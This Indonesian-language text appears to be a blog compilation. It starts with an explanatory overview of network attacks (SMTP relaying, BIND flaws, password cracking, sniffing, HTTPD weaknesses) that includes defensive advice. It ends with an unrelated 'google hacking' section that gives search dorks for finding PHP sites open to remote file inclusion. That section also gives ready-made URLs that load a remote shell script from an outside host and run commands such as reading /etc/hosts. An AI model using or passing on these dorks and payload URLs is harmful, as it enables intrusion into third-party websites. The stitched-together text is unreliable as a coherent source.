Pada saat kerawanan SMTP sulit untuk di exploitasi, attacker mungkin saja berpindah ke serangan tranport level jika ia tidak berhasil menyerang dengan cara command manipulation ataupun mail-flood. Serangan ini lebih digunakan untuk membuat gangguan daripada untuk menjebol suatu system. Seorang attacker biasanya akan menggunakan serangan jenis untuk mem flood Exchange Server dan memotong lalu lintas e-mail (trafic e-mail). Serangan ini juga dapat digunakan untuk membuat reputasi suatu organisasi menjadi buruk dengan mengirimkan spam atau offensive e-mail ke organisasi lainnya dengan sumber dan alamat dari organisasi tersebut.



Mail relaying, proses memalsukan asal/source email dengan cara meroutekannya ke arah mesin yang akan dibohongi, adalah type lain dari serangan transport-level. Teknik ini sangat berguna untuk membuat broadcasting spam secara anonymous. Berbagai macam isi(content) yang sering dikirim lewat e-mail. dengan teknik ini biasanya adalah content-content yang merusak. Beberapa Virus dan Worms akan disertakan dalam e-mail sebagai file attachment yang sah, seperti variant Melissa yang nampak sebagai Ms Word Macro atau loveletter worm yang menginfeksi system dan mengemailkan dirinya sendiri ke users yang berada dalam address booknya outlook. Kebanyakan antivirus scanner akan menangkap attachment seperti ini, tetapi visrus dan worm baru serta variannya masih tetap berbahaya.

Serangan yang terakhir yang dilakukan oleh seorang attacker selain serangan diatas adalah dengan cara melakukan social enginering, kadang sang attacker mengirim e-mail dengan source memakai alamat admin agar users mengirimkan passwordnya untuk mengupgrade system.

DNS and BIND Vulnerabilities

Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain (BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis yang diarahkan pada operasi dasar dari Internet (basic internet operation).

Kesalahan pada BIND sebenarnya bukanlah sesuatu yang baru. Semenjak permulaanya, standar BIND merupakan target yang paling favorite untuk diserang oleh komunitas cracker karena beberapa kerawanannya. Empat kerawanan terhadap buffer overflow yang terjadi pada bulan Januari lalu hanya beberapa bagian dari kerawanan untuk diexploitasi oleh para cracker agar mendapat akses terhadap system dan melakukan perintah dengan hak penuh (command execution priviledge).

Kerawanan pada BIND merupakan masalah yang sangat serius karena lebih dari 80 persen DNS yang berada di Jagat Internet dibangun menggunakan BIND. Tanpa adanya DNS dalam lingkungan Internet Modern, mungkin transmisi e-mail akan sulit, navigasi ke situs-situs web terasa rumit dan mungkin tidak ada hal mudah lainnya yang menyangkut internet.

Kerawanan BIND bukan hanya terletak pada DNS. System penerjemah alamat (number-address translator) merupakan subject dari kebanyakan exploit, termasuk untuk melakukan penyerangan di tingkat informasi, penyerangan Denial Of Service, pengambil alihan kekuasaan dengan hijacking. Penyerangan di tingkat Informasi bertujuan untuk membuat server menjawab sesuatu yang lain dari jawaban yang benar. Salah satu cara untuk melakukan serangan jenis ini adalah melalui cache poisoning, yang mana akan mengelabui remote name server agar menyimpan jawaban dari third-party domain dengan cara menyediakan berbagai macam informasi kepada domain server yang mempunyai autorisasi. Semua pengimplementasian serangan terhadap DNS akan mempunyai kemungkinan besar untuk berhasil dilakukan jika jawaban dari suatu pertanyaan yang spesisfik bisa dibohongi (spoof).

DOS atau membuat Server tidak dapat beroperasi, bisa dilakukan dengan cara membuat DNS menyerang dirinya sendiri atau juga dengan cara mengirimkan traffic-flooding yang berlebihan dari luar, contohnya menggunakan “Smurf” ICMP flood. Jika suatu organisasi atau perusahaan memasang authoritathive name server dalam satu segment yang terletak dibelakang satu link atau dibelakang satu physical area, maka hal ini akan menyebabkan suatu kemungkinan untuk dilakukannya serangan Denial Of Service.Cracker akan mencoba untuk menyerang system melalui DNS dengan cara buffer overflow, yaitu salah
satu exploit yang sangan berpotensi pada kerawanan BIND. Gangguan exploit terjadi karena adanya kelemahan dalam pengkodean/pemrograman BIND yang mengizinkan seorang attacker untuk memanfaatkan code-code yang dapat dieksekusi untuk masuk kedalam system. Beberapa system operasi telah menyediakan patch untuk stack agar tidak dapat dieksekusi, sebagaimana juga yang dilakukan compiler (menyediakan patch) yang melindungi stack dari overflow. Mekanisme perlindungan ini stidaknya membuat cracker akan sulit menggunakan exploit.

Telah jelas bahwa mengupdate system secara berkala dan menggunakan patch adalah salah satu yang harus dilakukan untuk membangun security yang efektif, jika vendor dari DNS anda tidak menyediakan patch secara berkala, anda lebih baik mengganti software DNS anda yang menyediakan patch secara berkala, tentunya untuk menjaga kemanan system. Pada system Unix , BIND harus dijalankan sebagai root untuk mengatur port yang lebih rendah (kodekode mesin). Jika software DNS dapat dibodohi untuk menjalankan code-code berbahaya, atau membuka file-file milik root, user local mungkin saja bisa menaikan kekuasaannya sendiri didalam mesin. Organisasi atau perusahaan yang mengubah authoritative server juga harus waspada bahwa mengganti server mereka dalam waktu yang bersamaan akan mengakibatkan domain mereka di hijack melalui cache poisoning. Mengubah server seharusnya dilakukan sebagai proses transisi. Untuk mencegah domain hijacking sebaiknya network admin terlebih dahulu menambahkn server barunya kedalam network infrastucture sebelum mengganti server yang lama.

Password Attacks

Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP. Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka sesuatu yang dilindungi oleh password. Ketika seorang attacker berhasil mendapatkan password yang dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih karyawan/user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai hal ini dengan cara teknikal. Kebnayakan seranagn yang dilakukan terhadap password adalah menebak (guessing), brute force, cracking dan sniffing. Penebakan(guessing) password bisa dilakukan dengan cara memasukan password satu persatu secara manual ataupun dengan bantuin script yang telah diprogram. Kebanyakan user menggunakan hal-hal yang umum untuk password mereka diantaranya tanggal lahir, dan biasanya user tidak menghawatirkan tentang aturan yang berlaku pada perusahaan untuk menggunakan kombinasi alphanumeric dan minimal 7 karakter. Jika saja user memakai tanggal lahirnya sebagai password maka hal penyerangan akan sangat mudah dilakukan, karena cracker tidak membutuhkan waktu yang lama hanya untuk menjebol 6 digit angka tanggal lahir. Beberapa user atau bahkan administrator dapat membuat pekerjaan cracker menjadi mudah andai saja mereka lupa untuk merubah password default dari sebuah software.

Sebenarnya, password guessing merupakan sesuatu yang sangat tidak efektif, dan dapat menghabiskan waktu. Network admin bisa dengan mudah mendetect serangan jika seorang attacker mencoba login dengan menebak password berkali-kali. Brute-force merupakan serangan yang menggunakan logika yang sama dengan password guessing tetapi serangan brute-force lebih cepat dan lebih powerfull. Dalam tipe serangan ini seorang attacker menggunakan script (biasanya program cracking gratis) yang akan mencoba password-password umum(biasanya terdapat dalam dictionary). Tujuan dari serangan jenis ini adalah untuk mempercepat penemuan password sebelum network admin menyadari adanya serangan. Walaupun serangan Brute-force lebih efisien daripada password guessing, kedua teknik tersebut pada dasarnya sama. Attacker umumnya lebih sulit untuk berhasil dengan kedua metoda tersebut. Lebih jauh lagi, kedua teknik tersebut sangat mudah di lawan dengan memanfaatkan features blacklisting, yang akan mengunci sebuah account user jika seseorang(attacker) berkali-kali memasukkan password secara tidak tepat. Contohnya, default blacklist dalam system unix adalah tiga kali (kesempatan memasukkan password).

Kelemahan dari perlindungan blacklist adalah bahwa feature blacklist ini dapat igunkan untuk menyerang system oleh attacker. Sebagai contoh, jika seorang attacker dapat mengidentifikasi siapa login name untuk network admin, sang attacker bisa saja menngunakan login name itu dan memasukkan password yang salah berulangkali dan akhirnya mengunci account admin ☺. Ketika sang admin sedang berusaha untuk mendapatkan aksesnya kembali, seorang attacker masih bisa untuk berhubungan dengan system. Password cracking adalah metoda untuk melawan perlindungan password yang dienkripsi yang berada di dalam system. Dengan anggapan bahwa atacker telah masuk kedalam system, ia bisa saja mengubah kekuasaannya didalam system dengan cara meng crack password file menggunakan metode brute-forcedictionary attack (mencocokan kata-kata yang berada dalam kamus dengan kata-kata yang dienkripsi dalam file password). Keberhasilan menggunakan cara ini bergantung pada kecepatan prosesor dan
program yang dimiliki oleh attacker. Cara yang terbaik untuk menghindari serangan jenis ini adalah dengan memonitor kewenangan akses pada file.

Dengan cara mengintip lalulintas pada port telnet(23) ataupun HTTPD (80), seorang attacker dapat mendapatkan password yang digunakan untuk internet dan koneksi secara remote melalui proses yang dinamakan password snifing. Cara inilah yang paling mudah dilakukan karena kedua koneksi tersebut tidak menggunakan enkripsi, kecuali koneksi yang menggunakan SSL (secure socket layer) pada HTTPD(biasanya ada tanda gembok terkunci dibawah browser, yang menandakan transaksi aman) atau juga menggunakan SSH (Secure SHell) untuk koneksi ke mesin lain secara remote.

9. Proxy Server Attacks

Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan proses dari beberapa host dalam suatu trusted network. Dalam kebanyakan kasus, tiap host mempunyai kekuasan untuk membaca dan menulis (read/write) yang berarti apa yang bisa saya lakukan dalam system saya akan bisa juga saya lakukan dalam system anda dan sebaliknya. Jika firewal yang berada dalam trusted network tidak dikonfigurasikan secara optimal, khususnya untuk memblok akses dari luar, apalagi jika autentikasi dan enkripsi tidak digunakan, seorang attacker bias menyerang proxy server dan mendapatkan akses yang sama dengan anggota trusted network lainnya. Jika attaker sudah masuk ke sistem ia tentunya bisa melakukan apa saja dan ia bisa melakukan DDOS(distributed denial of service) secara anoymous untuk menyerang network lain. Router yang tidak dikonfigurasikan secara optimal juga akan berfungsi sebagai proxy server dan akan mengakibatkan kerawanan yang sama dengan proxy server.

10. Remote Command Processing Attacks

Trusted Relationship antara dua atau lebih host menyediakan fasilitas pertukaran informasi dan resource sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota network kekuasaan akses yang sama di satu dan lain system (dalam network). Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi perintah dan mengkases data yang tersedia bagi user lainnya.

11. Remote File System Attack

Protocol-protokol untuk tranportasi data –tulang punggung dari internet— adalah tingkat TCP (TCPLevel) yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk mendapatkan akses ke direktori file. Tergantung pada OS (operating system) yang digunakan, attacker bisa meng extrack informasi tentang network, sharing privileges, nama dan lokasi dari user dan groups, dan spesifikasi dari aplikasi atau banner (nama dan versi software). System yang dikonfigurasi atau diamankan secara minimal akan dengan mudah membeberkan informasi ini bahkan melalui firewall sekalipun. Pada system UNIX, informasi ini dibawa oleh NFS (Network File System) di port 2049. system Windows menyediakan data ini pada SMB (server messaging block) dan Netbios pada port 135 - 139(NT) dan port 445 pada win2k.Network administrator bisa meminimalisasi resiko yang akan terjadi dengan menggunakan Protokolprotokol
tersebut dengan memberikan sedikit peraturan. Network dengan system windows, harusnya memblok akses ke port 139 dan 445 dari luar network, jika dimungkinkan. Dalam system unix port 2049 seharusnya di blok, sharing file dibatasi dan permintaan file melalui showmount(perintah dalam unix) seharusnya di catat dalam log.

12. Selective Program Insertions

Selective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-program penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ☺) pada system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan membuka backdoor. Biasanya antivirus yang dijual dipasaran akan dapat mendeteksi dan membersihkan program-program seperti ini, tetapi jika ada virus baru (anggap saja variant melissa) virus scanner belum tentu dapat menghadapi script-script baru. Beberapa network administrator melakukan pertahan terhadap malware dengan teknologi alternatif seperti behaviour blockers, yang memberhentikan kode-kode yang dicurigai berdasarkan contoh kelakuan malware, bukan berdasarkan signature. Beberapa aplikasi lainnya akan mengkarantina virus dan code-code yang dicurigai didalam daerah yang dilindungi, biasanya disebut sandboxes.

13. Port Scanning

Melalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi. Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack.

14. TCP/IP Sequence Stealing, Passive Port Listening and Packet
Interception

TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force, serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like. TCP/IP Sequence Stealing adalah pemetaan dari urutan nomor-nomor (angka), yang bisa membuat packet milik attacker terlihat legal. Ketika suatu system meminta sesi terhadap mesin lain, kedua system tersebut saling bertukar nomor-nomor sinkronisasi TCP. Jika tidak dilakukan secara acak, Attacker bisa mengenali algoritma yang digunakan untuk meng –generate nomor-nomor ini. Urutan nomor yang telah dicuri bias digunakan attacker untuk menyamar menjadi salah satu dari system tadi, dan akhirnya memperbolehkannya untuk melewati firewall. Hal ini sebenarnya efektif jika digunakan bersama IP Spoofing.


Melalui passive port listening, seorang attacker dapat memonitor dan mencatat (log) semua pesan dan file yang dikirim ke semua port yang dapat diakses pada target system untuk menemukan titik kerawanan. Packet Interception adalah bagian (tepatnya pelapis) dari active listener program yang berada pada port di system sasaran yang berfungsi untuk menerima ataupun mengembalikan semua tipe pesan (data) spesifik yang dikirim. Pesan tersebut bisa dikembalikan ke unauthorized system, dibaca dan akhir nya dikembalikan lagi baik tanpa perubahan atau juga dengan perubahan kepada attacker, atau bahkan tidak dikembalikan. Dalam beberapa versi atau juga menurut konfigurasi dari user SSHD(secured shell daemon), otentikasi bisa dilakukan dengan cara menggunakan public key (milik mesin tentunya). Jika seorang attacker mempelajari public key yang digunakan, ia bisa menciptakan atau memasukan paket-paket palsu. System sasaran akan menganggap pengirim paket palsu tersebut mempunyai hak akses.

15. HTTPD Attacks

Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd bypasses, cross scripting, web code vulnerabilities, dan URL floods. HTTPD Buffer Overflow bisa terjadi karena attacker menambahkan errors pada port yang digunakan untuk web traffic dengan cara memasukan banyak carackter dan string untuk menemukan tempat overflow yang sesuai. Ketika tempat untuk overflow ditemukan, seorang attacker akan memasukkan string yang akan menjadi perintah yang dapat dieksekusi. Bufer-overflow dapat memberikan attacker akses ke command prompt.
Beberapa feature dari HTTPD bisa digunakan untuk meciptakan HTTPD byapass, memberi akses ke server menggunakan fungsi logging. Dengan cara ini, sebuah halaman web bisa diakses dan diganti tanpa dicatat oleh web server. Cara ini sering digunakan oleh para cracker, hacktivis dan cyber vandals untuk mendeface website. Sedangkan kerawanan pada script-script web bisa terjadi pada semua bahasa pemrograman web dan
semua ekstensi aplikasi. Termasuk VB, Visual C++, ASP, TCL, Perl, PHP, XML, CGI dan Coldfusion. Pada dasarnya, attacker akan mengexploitasi kelemahan dari sebuah aplikasi, seperti CGI script yang tidak memeriksa input atau kerawanan pada IIS RDS pada showcode.asp yang mengizinkan menjalankan perintah secara remote (remote command priviledges). Melalui cross scripting dan cross-site scripting seorang attacker bisa mengexploitasi pertukaran cookies antara browser dan webserver. Fasilitas ini dapat mengaktifkan script untuk merubah tampilan web dll. Script ini bisa menjalankan malware, membaca infomasi penting dan meng expose data sensitive seperti nomor credit card dan password. Pada akhirnya attacker dapat menjalankan denial of service dengan URL flood, yang dilakukan dengan cara mengulang dan terus mengulang permintaan terhadap port 80 httpd yang melalui batas TTL (time to live). Beberapa user ataupun manager mungkin benci mendengar serangan-serangan tersebut. Tapi pada kenyataanya memang tidak ada yang benar-benar fix untuk mengamankan network ataupun website. Keamanan adalah suatu proses, bukan produk. Jika anda memasang firewall, IDSes(instrusion detection system), routers dan honeypots (system untuk jebakan) mungkin dapat menyediakan lapisan-lapisan untuk bertahan, tetapi sekali lagi peralatan paling canggih di dunia tidak akan menolong suatu organisasi sampai organisasi tersebut mempunyai proses untuk mengupgrade system, memakai patch, mengecek security pada system sendiri dan metode lain. Telah banyak perusahaan yang memakai IDSes tetapi tidak memonitor file log, mereka menginstall firewall, tetapi tidak mengupgradenya. Jalan terbaik untuk melindungi website maupun network dari serangan adalah mendekatkan keamanan sebagaimana tantangan yang sedang terjadi terhadap keamanan
itu sendiri, terus berusaha, selalu ingat basicnya dan jangan lupa untuk berdoa...Smile



Sumber : www.IlmuKomputer.Com

google hacking

1. allinurl filename
bugs filename ini targetnya dapat kita cari dengan keyword “allinurl:*.php?filename=*”.
keyword ‘*.php’ bisa di ganti dengan apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?filename=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts “
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

2. allinurl content
bugs content ini targetnya dapat kita cari dengan keyword “allinurl:*.php?content=”.
keyword ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?content=”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
” http://www.target.com/target/index.php?content=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts “
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

3. allinurl page
bugs page ini targetnya dapat kita cari dengan keyword “allinurl:*.php?page=*”.
‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?page=”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?page=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

4. allinurl link
bugs filename ini targetnya dapat kita cari dengan keyword “allinurl:*.php?link=*”.
keyword ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?link=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?link=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

5.allinurl file
bugs file ini targetnya dapat kita cari dengan keyword “allinurl:*.php?file=*”.
‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?file=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini:
http://www.target.com/target/index.php?file=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts
kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb.

thanks